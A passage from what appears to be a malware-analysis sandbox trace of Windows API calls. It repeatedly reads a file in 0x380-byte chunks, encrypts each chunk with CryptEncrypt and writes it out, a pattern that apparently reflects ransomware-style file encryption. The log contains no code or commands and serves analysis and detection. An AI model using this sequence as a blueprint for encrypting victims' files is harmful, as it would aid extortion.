lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.843] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.844] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.844] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.844] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.844] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.847] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.847] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.847] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.847] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.847] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.848] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.848] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.848] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.848] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.848] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.848] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.848] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.848] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.849] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.849] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.849] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.849] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.849] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.849] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.849] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.849] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.849] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.849] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.849] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.849] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.849] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.849] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.850] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.850] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.850] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.850] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.850] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.850] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.850] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.850] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.850] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.851] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.851] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.851] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.851] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 